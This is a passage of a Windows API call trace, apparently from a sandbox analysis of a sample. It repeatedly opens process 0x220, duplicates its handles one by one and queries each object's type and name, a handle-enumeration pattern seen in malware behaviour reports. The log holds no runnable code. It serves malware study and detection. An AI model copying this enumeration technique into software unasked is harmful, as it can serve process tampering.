ReturnLength=0xce88c) returned 0x0 [0113.276] GetTickCount () returned 0xe86393 [0113.276] GetTickCount () returned 0xe86393 [0113.276] CloseHandle (hObject=0x1b8) returned 1 [0113.276] GetTickCount () returned 0xe86393 [0113.276] CloseHandle (hObject=0x198) returned 1 [0113.276] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.276] GetTickCount () returned 0xe86393 [0113.276] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.276] GetTickCount () returned 0xe86393 [0113.276] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.277] GetTickCount () returned 0xe86393 [0113.277] GetTickCount () returned 0xe86393 [0113.277] CloseHandle (hObject=0x1b8) returned 1 [0113.277] GetTickCount () returned 0xe86393 [0113.277] CloseHandle (hObject=0x198) returned 1 [0113.277] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.277] GetTickCount () returned 0xe86393 [0113.277] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.277] GetTickCount () returned 0xe86393 [0113.277] GetTickCount () returned 0xe86393 [0113.277] CloseHandle (hObject=0x198) returned 1 [0113.277] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.277] GetTickCount () returned 0xe86393 [0113.277] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.277] GetTickCount () returned 0xe86393 [0113.277] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.277] GetTickCount () returned 0xe86393 [0113.278] GetTickCount () returned 0xe86393 [0113.278] CloseHandle (hObject=0x1b8) returned 1 [0113.278] GetTickCount () returned 0xe86393 [0113.278] CloseHandle (hObject=0x198) returned 1 [0113.278] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.278] GetTickCount () returned 0xe86393 [0113.278] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.278] GetTickCount () returned 0xe86393 [0113.278] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.278] GetTickCount () returned 0xe86393 [0113.278] GetTickCount () returned 0xe86393 [0113.278] CloseHandle (hObject=0x1b8) returned 1 [0113.278] GetTickCount () returned 0xe86393 [0113.278] CloseHandle (hObject=0x198) returned 1 [0113.278] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.278] GetTickCount () returned 0xe86393 [0113.279] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.279] GetTickCount () returned 0xe86393 [0113.279] GetTickCount () returned 0xe86393 [0113.279] CloseHandle (hObject=0x198) returned 1 [0113.279] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.279] GetTickCount () returned 0xe86393 [0113.279] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xbc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.279] GetTickCount () returned 0xe86393 [0113.279] GetTickCount () returned 0xe86393 [0113.279] CloseHandle (hObject=0x198) returned 1 [0113.279] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.279] GetTickCount () returned 0xe86393 [0113.279] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.279] GetTickCount () returned 0xe86393 [0113.280] GetTickCount () returned 0xe86393 [0113.280] CloseHandle (hObject=0x198) returned 1 [0113.280] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.280] GetTickCount () returned 0xe86393 [0113.280] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.280] GetTickCount () returned 0xe86393 [0113.280] GetTickCount () returned 0xe86393 [0113.280] CloseHandle (hObject=0x198) returned 1 [0113.280] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.280] GetTickCount () returned 0xe86393 [0113.280] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.280] GetTickCount () returned 0xe86393 [0113.280] GetTickCount () returned 0xe86393 [0113.280] CloseHandle (hObject=0x198) returned 1 [0113.280] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.280] GetTickCount () returned 0xe86393 [0113.281] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.281] GetTickCount () returned 0xe86393 [0113.281] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.281] GetTickCount () returned 0xe86393 [0113.281] GetTickCount () returned 0xe86393 [0113.281] CloseHandle (hObject=0x1b8) returned 1 [0113.281] GetTickCount () returned 0xe86393 [0113.281] CloseHandle (hObject=0x198) returned 1 [0113.281] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.281] GetTickCount () returned 0xe86393 [0113.281] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.281] GetTickCount () returned 0xe86393 [0113.282] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.282] GetTickCount () returned 0xe86393 [0113.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.282] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.282] GetTickCount () returned 0xe86393 [0113.282] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.282] GetTickCount () returned 0xe86393 [0113.282] CloseHandle (hObject=0x1b8) returned 1 [0113.282] GetTickCount () returned 0xe86393 [0113.282] CloseHandle (hObject=0x198) returned 1 [0113.282] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.282] GetTickCount () returned 0xe86393 [0113.282] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.282] GetTickCount () returned 0xe86393 [0113.282] GetTickCount () returned 0xe86393 [0113.282] CloseHandle (hObject=0x198) returned 1 [0113.283] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.283] GetTickCount () returned 0xe86393 [0113.283] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xd8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.283] GetTickCount () returned 0xe86393 [0113.283] GetTickCount () returned 0xe86393 [0113.283] CloseHandle (hObject=0x198) returned 1 [0113.283] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.283] GetTickCount () returned 0xe86393 [0113.283] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xdc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.283] GetTickCount () returned 0xe86393 [0113.283] GetTickCount () returned 0xe86393 [0113.284] CloseHandle (hObject=0x198) returned 1 [0113.284] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.284] GetTickCount () returned 0xe86393 [0113.284] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.284] GetTickCount () returned 0xe86393 [0113.284] GetTickCount () returned 0xe86393 [0113.284] CloseHandle (hObject=0x198) returned 1 [0113.284] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.284] GetTickCount () returned 0xe86393 [0113.284] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.284] GetTickCount () returned 0xe86393 [0113.284] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.284] GetTickCount () returned 0xe86393 [0113.284] GetTickCount () returned 0xe86393 [0113.284] CloseHandle (hObject=0x1b8) returned 1 [0113.284] GetTickCount () returned 0xe86393 [0113.285] CloseHandle (hObject=0x198) returned 1 [0113.285] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.285] GetTickCount () returned 0xe86393 [0113.285] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.285] GetTickCount () returned 0xe86393 [0113.285] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.285] GetTickCount () returned 0xe86393 [0113.285] GetTickCount () returned 0xe86393 [0113.285] CloseHandle (hObject=0x1b8) returned 1 [0113.285] GetTickCount () returned 0xe86393 [0113.285] CloseHandle (hObject=0x198) returned 1 [0113.285] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.285] GetTickCount () returned 0xe86393 [0113.285] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.285] GetTickCount () returned 0xe86393 [0113.286] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.286] GetTickCount () returned 0xe86393 [0113.286] GetTickCount () returned 0xe86393 [0113.286] CloseHandle (hObject=0x1b8) returned 1 [0113.286] GetTickCount () returned 0xe86393 [0113.286] CloseHandle (hObject=0x198) returned 1 [0113.286] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.286] GetTickCount () returned 0xe86393 [0113.286] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.286] GetTickCount () returned 0xe86393 [0113.286] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.286] GetTickCount () returned 0xe86393 [0113.286] GetTickCount () returned 0xe86393 [0113.286] CloseHandle (hObject=0x1b8) returned 1 [0113.287] GetTickCount () returned 0xe86393 [0113.287] CloseHandle (hObject=0x198) returned 1 [0113.287] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.287] GetTickCount () returned 0xe86393 [0113.287] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.287] GetTickCount () returned 0xe86393 [0113.287] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.287] GetTickCount () returned 0xe86393 [0113.287] GetTickCount () returned 0xe86393 [0113.287] CloseHandle (hObject=0x1b8) returned 1 [0113.287] GetTickCount () returned 0xe86393 [0113.287] CloseHandle (hObject=0x198) returned 1 [0113.287] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.287] GetTickCount () returned 0xe86393 [0113.287] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.288] GetTickCount () returned 0xe86393 [0113.288] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.288] GetTickCount () returned 0xe86393 [0113.288] GetTickCount () returned 0xe86393 [0113.288] CloseHandle (hObject=0x1b8) returned 1 [0113.288] GetTickCount () returned 0xe86393 [0113.288] CloseHandle (hObject=0x198) returned 1 [0113.288] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.288] GetTickCount () returned 0xe86393 [0113.288] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.288] GetTickCount () returned 0xe86393 [0113.288] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.288] GetTickCount () returned 0xe86393 [0113.288] GetTickCount () returned 0xe86393 [0113.288] CloseHandle (hObject=0x1b8) returned 1 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] CloseHandle (hObject=0x198) returned 1 [0113.289] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x100, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] CloseHandle (hObject=0x1b8) returned 1 [0113.289] GetTickCount () returned 0xe863a3 [0113.289] CloseHandle (hObject=0x198) returned 1 [0113.289] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.289] GetTickCount () returned 0xe863a3 [0113.290] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x104, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] CloseHandle (hObject=0x1b8) returned 1 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] CloseHandle (hObject=0x198) returned 1 [0113.290] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x108, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.290] GetTickCount () returned 0xe863a3 [0113.290] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.290] GetTickCount () returned 0xe863a3 [0113.291] GetTickCount () returned 0xe863a3 [0113.292] CloseHandle (hObject=0x1b8) returned 1 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] CloseHandle (hObject=0x198) returned 1 [0113.292] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] CloseHandle (hObject=0x1b8) returned 1 [0113.292] GetTickCount () returned 0xe863a3 [0113.292] CloseHandle (hObject=0x198) returned 1 [0113.292] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] CloseHandle (hObject=0x1b8) returned 1 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] CloseHandle (hObject=0x198) returned 1 [0113.293] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.293] GetTickCount () returned 0xe863a3 [0113.293] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.293] GetTickCount () returned 0xe863a3 [0113.294] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.294] GetTickCount () returned 0xe863a3 [0113.294] GetTickCount () returned 0xe863a3 [0113.294] CloseHandle (hObject=0x1b8) returned 1 [0113.294] GetTickCount () returned 0xe863a3 [0113.294] CloseHandle (hObject=0x198) returned 1 [0113.294] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.294] GetTickCount () returned 0xe863a3 [0113.294] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x118, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.294] GetTickCount () returned 0xe863a3 [0113.294] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.294] GetTickCount () returned 0xe863a3 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] CloseHandle (hObject=0x1b8) returned 1 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] CloseHandle (hObject=0x198) returned 1 [0113.295] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] CloseHandle (hObject=0x1b8) returned 1 [0113.295] GetTickCount () returned 0xe863a3 [0113.295] CloseHandle (hObject=0x198) returned 1 [0113.296] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x120, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] CloseHandle (hObject=0x1b8) returned 1 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] CloseHandle (hObject=0x198) returned 1 [0113.296] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x124, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.296] GetTickCount () returned 0xe863a3 [0113.296] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.297] GetTickCount () returned 0xe863a3 [0113.297] GetTickCount () returned 0xe863a3 [0113.297] CloseHandle (hObject=0x1b8) returned 1 [0113.297] GetTickCount () returned 0xe863a3 [0113.297] CloseHandle (hObject=0x198) returned 1 [0113.297] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.297] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x128, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.297] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.297] CloseHandle (hObject=0x1b8) returned 1 [0113.297] CloseHandle (hObject=0x198) returned 1 [0113.298] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.298] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.298] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.298] CloseHandle (hObject=0x1b8) returned 1 [0113.298] CloseHandle (hObject=0x198) returned 1 [0113.298] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.298] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x130, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.298] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, 